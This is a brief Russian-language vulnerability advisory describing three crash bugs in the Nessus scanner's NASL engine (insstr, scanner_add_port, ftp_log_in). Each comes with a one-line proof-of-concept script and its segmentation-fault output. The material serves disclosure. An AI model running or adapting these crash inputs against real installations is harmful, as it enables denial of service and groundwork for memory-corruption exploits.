Nessus -
бесплатный мощный сканер безопасности. Его
модульная архитектура позволяет легко и
просто настраивать его под определенные
нужды. В скриптовом движке NASL сканера
обнаружено несколько уязвимостей. Для их
использования необходимо иметь права на
установку плагинов в сканере либо
заставить кого-либо с такими правами
выполнить вредоносный nasl скрипт

Первая уязвимость найдена в функции insstr().

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)

Вторая - в scanner_add_port(), при использовании
длинного аргумента proto:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

Третья - переполнение буфера в ftp_log_in().

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

Оставить мнение